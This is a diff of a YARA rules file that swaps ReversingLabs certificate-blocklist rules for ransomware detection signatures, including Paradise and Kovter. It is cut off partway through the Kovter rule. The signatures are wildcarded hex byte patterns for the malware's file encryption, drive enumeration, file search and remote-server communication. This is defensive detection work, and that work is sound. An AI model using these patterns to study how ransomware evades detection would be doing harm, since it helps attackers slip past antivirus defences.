+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            00 02 19 17 73 ?? ?? ?? ?? 0A 1B 8D ?? ?? ?? ?? 25 16 02 16 02 [5-10] 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? A2 25 17 [5-10] A2 25 18 7E ?? ?? ?? ?? A2 25 19 [5-10] A2 25 1A 02 02
+            [5-10] 6F ?? ?? ?? ?? 17 D6 6F ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0B 07 [5-10] 28 ?? ?? ??
+            ?? 1A 18 73 ?? ?? ?? ?? 0C 08 21 00 00 00 00 00 00 00 00 6F ?? ?? ?? ?? 20 ?? ?? ?? ??
+            8D ?? ?? ?? ?? 0D 21 00 00 00 00 00 00 00 00 13 ?? 06 6F ?? ?? ?? ?? 13 ?? 73 ?? ?? ??
+            ?? 13 ?? 08 11 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
+            2B ?? 06 09 16 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 09 16 11 ?? 6F ?? ?? ?? ?? 11
+            ?? 11 ?? 6A D6 13 ?? 11 ?? 11 ?? FE ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 08
+            6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 28 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? DE ?? 2A
+        }
+		$enum_drives = {
+            00 00 28 ?? ?? ?? ?? 1F ?? 0A 18 0C 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 0C 28 ?? ?? ?? ?? 0D 1A
+            0C 09 13 ?? 16 13 ?? 11 ?? 11 ?? 8E 69 FE ?? 2C ?? 11 ?? 11 ?? 9A 13 ?? 1B 0C 11 ??
+            6F ?? ?? ?? ?? 2C ?? 1C 0C 11 ?? 6F ?? ?? ?? ?? 19 FE ?? 16 FE ?? 65 18 60 1A 60 11
+            ?? 6F ?? ?? ?? ?? 21 ?? ?? ?? ?? ?? ?? ?? ?? FE ?? 16 FE ?? 65 5F 16 FE ?? 2C ?? 1D
+            0C 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1E 0C 11 ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B
+        }
+		$file_search = {
+            A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10]
+            A2 25 20 ?? ?? ?? ?? [5-10] A2 25 20 ?? ?? ?? ?? [5-10] A2 0D 19 0C 19 8D ?? ?? ?? ??
+            25 16 [5-10] A2 25 17 [5-10] A2 25 18 [5-10] A2 13 04 1A 0C 02 28 ?? ?? ?? ?? 13 ?? 1B
+            0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? (30 | 3D) [1-4] 1C 0C 11 ?? 11 ?? 9A 28
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1D 0C 09 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 9A [5-10] 6F
+            ?? ?? ?? ?? 16 FE ?? 5F 11 ?? 11 ?? 9A 1F ?? 28 ?? ?? ?? ?? [5-10] 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 16 FE ?? 5F 11 ?? [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 5F 2C ?? 1E 0C 11 ?? 11 ??
+            9A 28 ?? ?? ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? (38 | 2B) [1-4] 1F ?? 0C 02 28 ?? ?? ?? ??
+            13 ?? 1F ?? 0C 11 ?? 8E 69 17 DA 13 ?? 16 13 ?? 11 ?? 11 ?? 30 ?? 1F ?? 0C 11 ?? 11 ??
+            11 ?? 9A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE ?? 2C ?? 1F ?? 0C 11 ?? 11 ?? 9A 28 ?? ??
+            ?? ?? 1F ?? 0C 11 ?? 17 D6 13 ?? 2B ?? 1F ?? 0C 02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F
+            ?? ?? ?? ?? 8E 69 17 DA 18 FE ?? 16 FE ?? 2C ?? 1F ?? 0C 02 16 28 ?? ?? ?? ?? DD ?? ??
+            ?? ?? 07 17 58 16 0B 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? DE
+        }
+		$remote_server_communication_1 = {
+            00 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 16 7E ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? 9A [5-10] 28 ??
+            ?? ?? ?? 0B 02 [5-10] 16 28 ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 02 [5-10] 16 28 ?? ?? ??
+            ?? 16 FE ?? 39 ?? ?? ?? ?? 1D 8D ?? ?? ?? ?? 25 16 [5-10] A2 25 17 02 A2 25 18 [5-10] A2
+            25 19 7E ?? ?? ?? ?? A2 25 1A [5-10] A2 25 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1C [5-10]
+            A2 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ??
+            [5-10] 11 ?? 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07
+            28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 11 ?? [5-10] 6F ?? ?? ?? ?? 11 ?? [5-10] 6F ?? ?? ?? ??
+            11 ?? 11 ?? 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ??
+            ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
+            74 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ISECURE GROUP PTY LTD" and pe.signatures [ i ] . serial == "23:f5:37:ce:13:c6:cc:cd:fd:3f:8c:e8:1f:b9:81:cb" and 1566086400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $enum_drives and $file_search and $encrypt_files and $remote_server_communication_1
 }
-
-rule REVERSINGLABS_Cert_Blocklist_73Ecfdbb99Aec176Ddfcf7958D120E1A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Paradise : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Paradise ransomware."
 		author = "ReversingLabs"
-		id = "84e20878-e4ea-53a5-9c1b-04f3c66276de"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9a92a05c-5f26-59ed-9934-a24bb7c31d8d"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3452-L3468"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Paradise.yara#L1-L81"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d911156707cef97acf79c096b5d4a4db166ddf05237168f1ecffb0c0a2ebd8fa"
+		logic_hash = "fc029bee999ec72416ac91d8386d4d270070035ad078bcab1dec11eea032c10b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Paradise"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            53 56 57 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 89 75 ?? 85 F6
+            0F 84 ?? ?? ?? ?? FF 75 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 56 FF
+            D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ??
+            ?? ?? 83 65 ?? ?? 8B 45 ?? 8B 74 85 ?? 8D 95 ?? ?? ?? ?? 85 F6 74 ?? 0F B7 02 83 F8
+            ?? 72 ?? 8D 48 ?? 83 F8 ?? 76 ?? 8B C8 0F B7 06 83 F8 ?? 72 ?? 83 F8 ?? 77 ?? 83 C0
+            ?? 3B C8 0F B7 02 75 ?? 66 85 C0 74 ?? 83 C2 ?? 83 C6 ?? EB ?? 0F B7 02 EB ?? 66 3B
+            06 1B C0 83 E0 ?? 40 EB ?? 33 C0 85 C0 0F 84 ?? ?? ?? ?? FF 45 ?? 83 7D ?? ?? 72 ??
+            8B 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 56 FF D7 83 C4 ?? F6 85 ??
+            ?? ?? ?? ?? 74 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 80 3D ?? ?? ?? ?? ?? 74 ?? BA
+            ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? EB ?? F6 85 ?? ?? ??
+            ?? ?? 74 ?? A1 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            85 C0 75 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ??
+            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? 53 FF 75 ?? FF D7 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ??
+            ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
+        }
+		$encrypt_files_p1 = {
+            56 57 6A ?? BE ?? ?? ?? ?? 5F E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 56 E8 ?? ??
+            ?? ?? 83 C4 ?? 83 C6 ?? 4F 75 ?? 33 F6 39 75 ?? 74 ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 0F
+            B7 88 ?? ?? ?? ?? 56 56 51 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 59 89 4D
+            ?? 33 C0 8A 90 ?? ?? ?? ?? 88 90 ?? ?? ?? ?? 3B C6 75 ?? 33 C0 40 3B C1 72 ?? 68 ??
+            ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 5F 5E C9 C3 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15
+        }
+		$encrypt_files_p2 = {
+            53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB
+            53 53 8D 44 24 ?? 50 89 5C 24 ?? FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 44
+            24 ?? 50 FF D6 85 C0 75 ?? 89 5C 24 ?? 39 5C 24 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 0F B6 80 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
+            74 24 ?? E8 ?? ?? ?? ?? 59 53 FF 74 24 ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 53 53
+            53 53 C6 05 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 88 1D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 59 33 C0 88 98 ?? ?? ?? ?? 3B C3 75 ?? 33 C0 40 83 F8 ?? 72 ?? 6A ?? 5E
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 53 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 4E 75 ?? 8B 3D ??
+            ?? ?? ?? 81 C7 ?? ?? ?? ?? 6A ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 75 ?? 57 E8
+            ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
+        }
+		$http_remote_connection = {
+            53 56 57 FF 75 ?? 33 FF 8D 75 ?? 89 7D ?? E8 ?? ?? ?? ?? 59 89 7D ?? 57 57 57 FF 75
+            ?? 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 FF 75 ??
+            FF 75 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ?? 57
+            0F 95 C1 B8 ?? ?? ?? ?? 49 23 C8 03 C8 51 57 57 57 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 8B D8 3B DF 74 ?? 57 57 57 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33
+            F6 57 57 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C6 3B C7
+            75 ?? 89 7D ?? EB ?? 50 39 7D ?? 75 ?? E8 ?? ?? ?? ?? 59 EB ?? FF 75 ?? 6A ?? FF 15
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 C6 50 53
+            FF 15 ?? ?? ?? ?? 03 75 ?? 39 7D ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39 7D ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9
+            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B
+            C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MHOW PTY LTD" and pe.signatures [ i ] . serial == "73:ec:fd:bb:99:ae:c1:76:dd:fc:f7:95:8d:12:0e:1a" and 1566864000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_files and $http_remote_connection and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_675129Bb174A5B05E330Cc09F8Bbd70A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Kovter : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Kovter ransomware."
 		author = "ReversingLabs"
-		id = "97046206-efc4-58dd-a9df-4966bad3902d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9362ac5a-0b6c-5ac5-ac2b-59dcc1191dc6"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3470-L3486"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Kovter.yara#L1-L141"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d989ea5233e8a64bffa0e29645c3458ef1f5173158ced7814c3b473b92ef49f4"
+		logic_hash = "3082e036b54a73ce8397cfa6e8dc2a807c587d9f17286e75af6cdbe622fae1e1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Kovter"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
+            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 8B 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 A1 ?? ?? ?? ?? 80 38 ?? 74
+            ?? 8B CE 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 C0
+            89 45 ?? 33 C0 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 75 ?? B3 ?? 8D 45 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ??
+            ?? ?? ?? 5A 2B C2 83 C0 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ??
+            8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D
+            85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ??
+            8B D0 42 8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D
+        }
+		$remote_connection_2 = {
+            45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0D ?? ??
+            ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A
+            ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ??
+            ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ??
+            83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF
+            0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D
+            45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45
+            ?? 0D ?? ?? ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50
+            E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B
+            45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8
+            85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B
+        }
+		$remote_connection_3 = {
+            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ??
+            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ??
+            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ??
+            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$find_files = {
+            50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87
+            ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ??
